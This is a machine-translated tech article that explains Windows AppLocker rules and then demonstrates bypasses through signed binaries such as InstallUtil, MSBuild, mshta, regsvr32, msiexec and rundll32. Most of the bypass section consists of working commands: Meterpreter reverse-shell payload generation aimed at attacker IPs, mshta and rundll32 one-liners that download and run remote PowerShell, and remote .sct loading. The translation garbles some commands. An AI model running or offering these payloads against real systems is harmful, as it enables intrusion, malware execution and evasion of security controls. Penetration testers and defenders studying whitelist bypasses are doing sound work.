Shulou(Shulou.com)05/31 Report--

This article introduces you how to carry out AppLocker bypass analysis, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Preface what is applocker

AppLocker, or "application control policy", is a new security feature in Windows 7 systems. This feature is integrated by default in all systems above win7, and we can use to enable Application Identity in services, and then find the Applocker option in Application Control Policies in local security policy.

Applocker rule

The default Applocker rules support the following:

Rule * * | associated file format-executable file | .exe, .com script | .ps1, .bat, .cmd, .vbs, .js Windows Installer file | .msi, .msp, .mst encapsulated application and encapsulated application installer | .appx DLL file | .dll, .ocx

Not all applocker will exist in .appx. According to the windows version, on win10, the corresponding .applocker file will be produced in C:\ Windows\ System32\ AppLocker after creating the applocker rule.

Applocker rule condition

Rule conditions are standards used to help AppLocker identify the application to which the rule is to be applied. The three main rule conditions are publisher, path, and file hash.

Publisher: identify it based on the digital signature of the application

Path: identify it by its location in the computer file system or on the network

File hash: an encrypted hash that represents the system calculation of the identified file

AppLocker default rules

After you create an applocker rule, you will be asked whether to add a default rule by default, as shown in the following figure:

The default rules for each rule are as follows:

The default rule types that can be executed are:

Allow members of the local Administrators group to run all applications.

Allow members of the Everyone group to run applications in the Windows folder.

Allow members of the Everyone group to run applications in the Program Files folder.

The default rule types for scripts are:

Allow members of the local Administrators group to run all scripts.

Allow members of the Everyone group to run scripts in the Program Files folder.

Allow members of the Everyone group to run scripts in the Windows folder.

The default rule types for Windows Installer are:

Allow members of the local Administrators group to run all Windows Installer files.

Allows members of the Everyone group to run all digitally signed Windows Installer files.

Allow members of the Everyone group to run all Windows Installer files in the Windows\ Installer folder.

DLL default rule type:

Allow members of the local Administrators group to run all DLL.

Allow members of the Everyone group to run DLL in the Program Files folder.

Allow members of the Everyone group to run DLL in the Windows folder.

Encapsulation applies the default rule type:

Allow members of the Everyone group to install and run all signed encapsulated applications and encapsulated application installers

AppLocker rule behavior

Rules can be configured to use allow or deny actions:

Allow it. You can specify which files are allowed to run in your environment and which users or user groups you are targeting. You can also configure exceptions to identify files that are excluded from the rule.

No. You can specify which files not allows to run in your environment and which users or user groups are targeted. You can also configure exceptions to identify files that are excluded from the rule.

Create an applocker rule

With all that said, let's take banning running exe files on the desktop as an example to create a rule. The creation is roughly as follows:

Run the exe test:

The system will stop us from running.

Bypass Applocker

Installutil.exe

InstallUtil, part of the .NET Framework, is a command-line program that allows users to quickly install and uninstall applications from the command prompt. Because this utility is a Microsoft-signed binary, it can be used to bypass AppLocker restrictions to run any .NET executable. The utility is also located in the Windows folder, which does not apply the AppLocker policy because the contents of the Windows folder need to be executed for the system to function properly.

First we use WhiteListEvasion (https://github.com/khr0x40sh/WhiteListEvasion) to generate a template

Python InstallUtil.py-cs_file pentestlab.cs-exe_file / root/Desktop/pentestlab.exe-payload windows/meterpreter/reverse_https-lhost 192.168.0.103-lport 443

The above command will generate a C# template that will contain Metasploit ShellCode.

Place the generated file in the target using the following method:

C:\ Windows\ Microsoft.NET\ Framework\ v2.0.50727\ InstallUtil.exe / logfile= / LogToConsole=false / U / root/payload.exe

Of course, you can also use msf to generate a payload of csharp, then replace the shellcode in the template, and then transfer the cs file to the target.

Then compile our script with csc:

C:\ Windows\ Microsoft.NET\ Framework\ v2.0.50727\ csc.exe / out:exeshell.exe exeshell.cs

At this point, let's try to execute our file:

Be intercepted by the rules, then we use the

C:\ Windows\ Microsoft.NET\ Framework\ v2.0.50727\ InstallUtil.exe / logfile= / LogToConsole=false / U exeshell.exe

Bypass

Msf successfully launched

There are also bypass modules in msf that use InstallUtil.exe for applocker.

Exploit/windows/local/applocker_bypass

The principle is the same.

With common paths:

C:\ Windows\ Microsoft.NET\ Framework\ v2.0.50727\ InstallUtil.exe

C:\ Windows\ Microsoft.NET\ Framework64\ v2.0.50727\ InstallUtil.exe

C:\ Windows\ Microsoft.NET\ Framework\ v4.0.30319\ InstallUtil.exe

C:\ Windows\ Microsoft.NET\ Framework64\ v4.0.30319\ InstallUtil.exe

Msbuild.exe

MSBuild.exe (Microsoft Build Engine) is the software build platform used by Visual Studio. It uses project files in XML format that define the requirements for building various platforms and configurations. (reference: MSDN MSBuild)

We can use MSBuild to proxy code execution through the trusted Windows utility. The MSBuild inline task feature introduced in .NET version 4 allows C # code to be inserted into XML project files. Inline task MSBuild compiles and executes inline tasks. MSBuild.exe is a signed Microsoft binary, so when used in this way, it can execute arbitrary code and bypass application whitelist protection configured to allow MSBuild.exe to execute.

We use GreatSCT to generate a xml file directly here.

. / GreatSCT.py-- ip 192.168.0.106-- port 4444-t bypass-p msbuild/meterpreter/rev_tcp.py

And will generate a rc file for us, we can use msfconsole-r to start msf directly

Then use msbuild to execute

Msf is launched:

Of course, you can also use msf to generate a c # shellcode and then use the template of Sanhao student master to load:

Https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml

Note that the suffix name is changed to .csproj

In addition to bouncing shell, we can also use it to bypass the limitations of powershell.

The code is as follows:

Results = pipeline.Invoke (); runspace.Close (); / / Convert records to strings StringBuilder stringBuilder = new StringBuilder (); foreach (PSObject obj in results) {stringBuilder.Append (obj);} return stringBuilder.ToString (). Trim ();} public static void RunPSFile (string script) {PowerShell ps = PowerShell.Create (); ps.AddScript (script). Invoke ();}}] >

Original address: https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20PowerShellCommands.xml

Successfully bypassed the restrictions on powershell.

Common paths are as follows:

C:\ Windows\ Microsoft.NET\ Framework\ v2.0.50727\ Msbuild.exe

C:\ Windows\ Microsoft.NET\ Framework64\ v2.0.50727\ Msbuild.exe

C:\ Windows\ Microsoft.NET\ Framework\ v3.5\ Msbuild.exe

C:\ Windows\ Microsoft.NET\ Framework64\ v3.5\ Msbuild.exe

C:\ Windows\ Microsoft.NET\ Framework\ v4.0.30319\ Msbuild.exe

C:\ Windows\ Microsoft.NET\ Framework64\ v4.0.30319\ Msbuild.exe

Mshta.exe

Mshta.exe is a Microsoft Windows operating system related program, English full name Microsoft HTML Application, can be translated into Microsoft hypertext markup language application, used to execute .HTA files. The default is integrated in the environment variable.

There are many ways to use Mshta, and we use msf's exploit/windows/misc/hta_server module for testing here:

Use exploit/windows/misc/hta_server msf exploit (windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit (windows/misc/hta_server) > exploit

Target machine execution:

Mshta.exe http://192.168.0.106:8080/JR1gb3TO6.hta

You can go online.

In addition to this method, hta can also be launched using cobaltstrike, Setoolkit, Magic unicorn, Empire, CactusTorch, Koadic, Great SCT, etc.

In addition to local files, mshta also supports remote downloading of payload, such as:

Mshta.exe _ javascript:a=GetObject ("script: https://gist.github.com/someone/something.sct").Exec();close();

In addition to the above, mshta can be used to execute powershell:

Set objShell = CreateObject ("Wscript.Shell") objShell.Run "powershell-nop-exec bypass-c IEX (New-Object Net.WebClient) .DownloadString ('http://ip:port/')"

Even though applocker has banned powershell execution

InfDefaultInstall.exe

InfDefaultInstall.exe is a tool for inf installation, signed by Microsoft, and exists as follows:

C:\ Windows\ System32\ Infdefaultinstall.exe

C:\ Windows\ SysWOW64\ Infdefaultinstall.exe

We can also use it to get around some restrictions. Usage is directly followed by your inf file.

Its execution process is as follows:

The poc address given by the author is as follows:

Https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a

The idea is also the same as in the figure, using shady.inf to call the remote sct backdoor.

However, his call requires higher permissions. I took a screenshot of running under win10:

Mavinject.exe

Mavinject is a built-in windows component on top of win10, which we can use for dll injection and bypass some limitations.

The usage is as follows:

Mavinject32.exe

Common paths are as follows:

C:\ Program Files\ Common Files\ microsoft shared\ ClickToRun\ MavInject32.exe

C:\ Windows\ System32\ mavinject.exe

C:\ Windows\ SysWOW64\ mavinject.exe

But my local reproduction did not successfully inject, but there is no hint, I do not know what the specific reason is, the version is: 10.0.15063.0 (WinBuild.160101.0800)

It should be able to be injected successfully, with a picture of the success of the Twitter boss.

If you are interested, you can try several more systems.

MSIEXEC

MSIEXEC is an application of Microsoft that can be used to install or configure products from the command line. As a matter of fact, this is not very strange. I have also written articles about using it to raise rights. Let's assume that the msi file can be executed to bypass applocker's restrictions on powershell.

First use msf to generate a msi file.

Msfvenom-f msi-p windows/exec CMD=powershell.exe > powershell.msi

Execute under windows:

Successfully bypassed.

Msxsl.exe

Msxsl.exe is a xml converter with a Microsoft digital signature. Download address is as follows:

Https://www.microsoft.com/en-us/download/details.aspx?id=21714

We use 3gstudent to try to bypass applocker's restrictions on calc

Customers.xml:

John Smith 123 Elm St. (123) 456-7890 Mary Jones 456 Oak Ave. (156) 789-0123

Script.xml:

Function xml (nodelist) {var r = new ActiveXObject ("WScript.Shell") .Run ("calc.exe"); return nodelist.nextNode () .xml;}

Successfully bypassed:

Of course, you can also execute our shellcode. For more information:

Https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml

Regsv***.exe

Regsv*** is a Windows command line utility that registers and unregisters .dll files and ActiveX controls to the registry.

File location:

C:\ Windows\ System32\ regsv***.exe

C:\ Windows\ SysWOW64\ regsv***.exe

The following is a demonstration to bypass applocker online.

The scT file is as follows:

The meaning of each parameter:

Silently does not display any messages / s

Do not call DLL registration server / n

Use another IP address because it does not call the DLL registration server / I

Use the unregistration method / / u

In addition to local execution, it also supports remote loading:

Regsv*** / u / n / s / i: http://ip:port/payload.sct scrobj.dll

We can use GreatSct to generate sct.

Rundll32.exe

Rundll32 is an Microsoft binary file that executes the code in the DLL file. Because this utility is part of the Windows operating system, it can be used as a way to bypass AppLocker rules or software restriction policies

Sir, become our payload:

Target machine execution:

Rundll32.exe _ javascript: "\..\ mshtml,RunHTMLApplication"; [xss_clean] (); new%20ActiveXObject ("WScript.Shell") .Run ("powershell-nop-exec bypass-c IEX (New-Object Net.WebClient) .DownloadString ('http://ip:port/');"")

Go online:

In addition to remote, you can also go online locally:

Rundll32 shell32.dll,Control_RunDLL C:\ Users\ pentestlab.dll

It can also be used to bypass restrictions on some software, such as playing a cmd:

On how to conduct AppLocker bypass analysis to share here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.